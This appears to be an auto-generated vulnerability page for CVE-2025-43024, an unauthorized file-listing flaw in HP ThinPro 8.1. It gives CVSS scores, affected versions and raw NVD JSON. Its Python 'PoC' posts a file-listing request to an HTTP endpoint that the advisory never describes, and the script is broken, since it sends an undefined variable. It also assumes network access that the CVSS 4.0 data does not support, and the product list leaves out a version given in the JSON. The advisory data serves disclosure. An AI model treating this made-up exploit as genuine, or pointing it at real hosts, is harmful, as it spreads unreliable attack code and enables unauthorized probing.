Security Vulnerability Report
中文
CVE-2025-43024 CVSS 7.5 HIGH

CVE-2025-43024

Published: 2025-10-28 00:15:39
Last Modified: 2026-01-29 14:00:32

Description

A GUI dialog of an application allows to view what files are in the file system without proper authorization.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:hp:thinpro:8.1:sp2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:hp:thinpro:8.1:sp3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:hp:thinpro:8.1:sp4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:hp:thinpro:8.1:sp5:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:hp:thinpro:8.1:sp6:*:*:*:*:*:* - VULNERABLE
HP Applications (未修补版本)
具体受影响版本需参考HP官方安全公告

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-43024 PoC - HP GUI Dialog Unauthorized File Access # This PoC demonstrates the file system enumeration vulnerability import requests import json TARGET_URL = "http://target-host" CVE_ID = "CVE-2025-43024" def exploit_gui_dialog_file_access(): """ Exploit the vulnerable GUI dialog to enumerate file system contents """ headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/json" } # Attempt to access GUI dialog file enumeration endpoint exploit_payload = { "action": "list_files", "path": "/", "dialog_type": "file_browser" } print(f"[*] Exploiting {CVE_ID}") print(f"[*] Target: {TARGET_URL}") try: # Send exploit request response = requests.post( f"{TARGET_URL}/api/gui/dialog", json=explore_payload, headers=headers, timeout=10 ) if response.status_code == 200: data = response.json() print(f"[+] Success! File system contents exposed:") print(json.dumps(data, indent=2)) return True else: print(f"[-] Failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": exploit_gui_dialog_file_access()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43024", "sourceIdentifier": "[email protected]", "published": "2025-10-28T00:15:38.563", "lastModified": "2026-01-29T14:00:32.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A GUI dialog of an application allows to view what files are in the file system without proper authorization."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hp:thinpro:8.1:sp2:*:*:*:*:*:*", "matchCriteriaId": "EA354C92-93B8-4683-989F-BEF60F1AC82E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hp:thinpro:8.1:sp3:*:*:*:*:*:*", "matchCriteriaId": "1A09690E-88F9-474C-A077-EEC14D8B5E59"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hp:thinpro:8.1:sp4:*:*:*:*:*:*", "matchCriteriaId": "65D6E120-98D8-413A-91CF-AC5166E6C7E6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hp:thinpro:8.1:sp5:*:*:*:*:*:*", "matchCriteriaId": "261A9B99-8C3C-43B0-9DB9-D8F2A3E83C7B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hp:thinpro:8.1:sp6:*:*:*:*:*:*", "matchCriteriaId": "8F0E012B-0867-4CF2-9869-4C238D132A59"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hp:thinpro:8.1:sp7:*:*:*:*:*:*", "matchCriteriaId": "E6C6148F-662D-4FCA-8F19-6BB1B6B056BE"}]}]}], "references": [{"url": "https://support.hp.com/us-en/document/ish_13164593-13164617-16/hpsbhf04066", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}